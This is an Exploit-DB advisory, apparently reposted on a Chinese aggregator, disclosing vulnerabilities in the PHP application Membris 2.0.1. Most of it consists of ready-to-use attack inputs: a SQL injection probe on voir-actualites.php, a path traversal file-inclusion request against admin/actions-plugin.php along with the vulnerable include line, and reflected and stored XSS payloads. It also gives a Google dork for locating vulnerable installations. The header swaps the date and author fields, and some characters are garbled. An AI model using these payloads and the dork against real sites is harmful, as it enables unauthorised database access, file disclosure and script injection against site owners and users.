Membris 2.0.1 – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： Dr.abolalh
  日期： 2012-06-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18970/

• ###################################
  # Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
  # Google Dork: Powered by Membris v 2.0.1
  # Date: Dr.abolalh
  # Author:01/06/2012
  # E-Mail: xa3@hotmail.com
  # Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
  # Version: Membris v 2.0.1
  ###################################
  
  # Exploit-DB Note:
  # Application also suffers from
  # stored XSS in the messaging system.
  # Insert <script>alert('xss');</script>
  # in the message body.
  
  
  
  SQL:
  voir-actualites.php
  
  Exploit:
  voir-actualites.php?idn=1 '
  
  +-----------------------------------------------------------+
  
  File Inclusion
  
  
  include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
  
  Exploit:
  admin/actions-plugin.php�acces=../index.php
  
  +-----------------------------------------------------------+
  
  XSS
  search.php
  
  Exploit:
  search.php?req= XSS
  
  search.php?req='--></style></script><script>alert(0x0002BC)</script>
  +-----------------------------------------------------------+
  
  #+--------------------------------------------------+#
  #[�] Greetz to : sec4ever#
  #---------------------------------------------------+#